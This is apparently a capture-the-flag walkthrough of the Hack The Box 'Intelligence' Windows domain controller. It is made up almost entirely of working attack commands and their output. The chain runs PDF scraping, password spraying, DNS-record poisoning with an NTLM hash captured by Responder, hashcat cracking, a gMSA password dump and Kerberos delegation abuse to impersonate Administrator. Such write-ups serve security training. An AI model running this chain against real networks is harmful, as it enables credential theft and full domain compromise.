$ rustscan -a 10.129.137.82
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
49667/tcp open unknown syn-ack
49677/tcp open unknown syn-ack
49678/tcp open unknown syn-ack
49698/tcp open unknown syn-ack
49704/tcp open unknown syn-ack
52979/tcp open unknown syn-ack
$ sudo nmap -p- -T4 -A 10.129.137.82
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-06 23:30:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m53s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m54s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m53s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-07-06T23:32:03+00:00; +6h59m54s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
49704/tcp open msrpc Microsoft Windows RPC
52979/tcp open msrpc Microsoft Windows RPC
$ echo 10.129.137.82 intelligence.htb dc.intelligence.htb | sudo tee -a /etc/hosts
$ nikto -h http://intelligence.htb
$ dirb http://intelligence.htb
http://intelligence.htb/documents/2020-01-01-upload.pdf
http://intelligence.htb/documents/2020-12-15-upload.pdf
contact@intelligence.htb
download all pdf files:
import requests
import wget
def url_ok(url):
r = requests.head(url)
return r.status_code
year = 2019
while year < 2022:
month = 1
while month < 13:
day = 1
while day < 31:
date = str(year) + "-" + str(month).zfill(2) + "-" + str(day).zfill(2)
pdf = date + "-upload.pdf"
url = "http://intelligence.htb/documents/" + pdf
url_status = url_ok(url)
if url_status == 200:
print(url + "\t" + "Document Exists\n")
wget.download(url, pdf)
day += 1
month += 1
year += 1
kali@kali:~/0.htb/release_arena/Intelligence/doc$ pdfgrep password *.pdf
2020-06-04-upload.pdf:Please login using your username and the default password of:
2020-06-04-upload.pdf:After logging in please change your password as soon as possible.
http://intelligence.htb/documents/2020-06-04-upload.pdf
New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible
kali@kali:~/0.htb/release_arena/Intelligence/pdf$ exiftool *.pdf | grep Creator | awk '{print $3}' | sort -u > users.txt
kali@kali:~/0.htb/release_arena/Intelligence/pdf$ cat users.txt
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee
$ crackmapexec ldap intelligence.htb -u ./users.txt -p 'NewIntelligenceCorpUser9876'
LDAP 10.129.137.82 389 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Thomas.Hall:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876
LDAP 10.129.137.82 389 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
kali@kali:~/0.htb/release_arena/Intelligence$ smbclient -L \\\\intelligence.htb\\ -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Users Disk
SMB1 disabled -- no workgroup available
kali@kali:~/0.htb/release_arena/Intelligence$
kali@kali:~/0.htb/release_arena/Intelligence$ smbclient \\\\intelligence.htb\\IT -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Apr 18 20:50:55 2021
.. D 0 Sun Apr 18 20:50:55 2021
downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021
3770367 blocks of size 4096. 1437988 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (9.7 KiloBytes/sec) (average 9.7 KiloBytes/sec)
smb: \>
smbclient \\\\intelligence.htb\\Users -U Tiffany.Molina
kali@kali:~/0.htb/release_arena/Intelligence$ smbclient \\\\intelligence.htb\\Users -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Apr 18 21:20:26 2021
.. DR 0 Sun Apr 18 21:20:26 2021
Administrator D 0 Sun Apr 18 20:18:39 2021
All Users DHSrn 0 Sat Sep 15 03:21:46 2018
Default DHR 0 Sun Apr 18 22:17:40 2021
Default User DHSrn 0 Sat Sep 15 03:21:46 2018
desktop.ini AHS 174 Sat Sep 15 03:11:27 2018
Public DR 0 Sun Apr 18 20:18:39 2021
Ted.Graves D 0 Sun Apr 18 21:20:26 2021
Tiffany.Molina D 0 Sun Apr 18 20:51:46 2021
3770367 blocks of size 4096. 1438244 blocks available
smb: \>
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
$ cat downdetector.ps1
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
$ python3 krbrelayx-master/dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 --action add -r web.intelligence.htb -d 10.10.14.34 10.129.137.82
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/home/kali/0.htb/release_arena/Intelligence/krbrelayx-master/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully
kali@kali:~/0.htb/release_arena/Intelligence$
$ sudo responder -I tun0 -A
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [ON]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.14.34]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-S68NRQA808Z]
Responder Domain Name [36ZS.LOCAL]
Responder DCE-RPC Port [48746]
[i] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
[Analyze mode: ICMP] You can ICMP Redirect on this network.
[Analyze mode: ICMP] This workstation (10.10.14.34) is not on the same subnet than the DNS server (192.168.8.2).
[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.
[+] Listening for events...
[HTTP] NTLMv2 Client : 10.129.137.82
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:a8c6796a545b97ca:508A3579A7B1715B69176066E5C68141:0101000000000000D5FD7B3F7873D70182DE8300667F48AF0000000002000800330036005A00530001001E00570049004E002D005300360038004E005200510041003800300038005A0004001400330036005A0053002E004C004F00430041004C0003003400570049004E002D005300360038004E005200510041003800300038005A002E00330036005A0053002E004C004F00430041004C0005001400330036005A0053002E004C004F00430041004C000800300030000000000000000000000000200000D38D5EC815CEE064867BD79E03809568C091433B9CBCE194FB1F6C5D959E4E8E0A001000000000000000000000000000000000000900440048005400540050002F0077006500620073006F006D0065007400680069006E0067002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
[*] Skipping previously captured hash for intelligence\Ted.Graves
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --show
TED.GRAVES::intelligence:a8c6796a545b97ca:508a3579a7b1715b69176066e5c68141:0101000000000000d5fd7b3f7873d70182de8300667f48af0000000002000800330036005a00530001001e00570049004e002d005300360038004e005200510041003800300038005a0004001400330036005a0053002e004c004f00430041004c0003003400570049004e002d005300360038004e005200510041003800300038005a002e00330036005a0053002e004c004f00430041004c0005001400330036005a0053002e004c004f00430041004c000800300030000000000000000000000000200000d38d5ec815cee064867bd79e03809568c091433b9cbce194fb1f6c5d959e4e8e0a001000000000000000000000000000000000000900440048005400540050002f0077006500620073006f006d0065007400680069006e0067002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy
http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html
kali@kali:~/0.htb/release_arena/Intelligence$ git clone https://github.com/micahvandeusen/gMSADumper.git
Cloning into 'gMSADumper'...
remote: Enumerating objects: 8, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (7/7), done.
remote: Total 8 (delta 0), reused 8 (delta 0), pack-reused 0
Receiving objects: 100% (8/8), 14.02 KiB | 341.00 KiB/s, done.
kali@kali:~/0.htb/release_arena/Intelligence$ cd gMSADumper/
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ ll
total 36
-rw-r--r-- 1 kali kali 3312 Jul 6 13:50 gMSADumper.py
-rw-r--r-- 1 kali kali 0 Jul 6 13:50 __init__.py
drwxr-xr-x 2 kali kali 4096 Jul 6 13:50 __pycache__
-rw-r--r-- 1 kali kali 491 Jul 6 13:50 README.md
-rw-r--r-- 1 kali kali 22862 Jul 6 13:50 structure.py
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
svc_int$:::d64b83fe606e6d3005e20ce0ee932fe2
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ sudo net time set -S intelligence.htb
[sudo] password for kali:
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ getST.py intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
2 -impersonate Administrator
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
# Export RKB Ticket
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ export KRB5CCNAME=Administrator.ccache
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Tiffany.Molina\Desktop\user.txt'
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
[!] This will work ONLY on Windows >= Vista
[*] Creating task \tgNjYZHc
[*] Running task \tgNjYZHc
[*] Deleting task \tgNjYZHc
[*] Attempting to read ADMIN$\Temp\tgNjYZHc.tmp
2cca7a12ad640c699d8069c7a2eab160
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$ atexec.py -k -no-pass dc.intelligence.htb 'type C:\Users\Administrator\Desktop\root.txt'
Impacket v0.9.23.dev1 - Copyright 2020 SecureAuth Corporation
[!] This will work ONLY on Windows >= Vista
[*] Creating task \MEbHJZiS
[*] Running task \MEbHJZiS
[*] Deleting task \MEbHJZiS
[*] Attempting to read ADMIN$\Temp\MEbHJZiS.tmp
dd95742569cd89e4eecb082d39c44891
kali@kali:~/0.htb/release_arena/Intelligence/gMSADumper$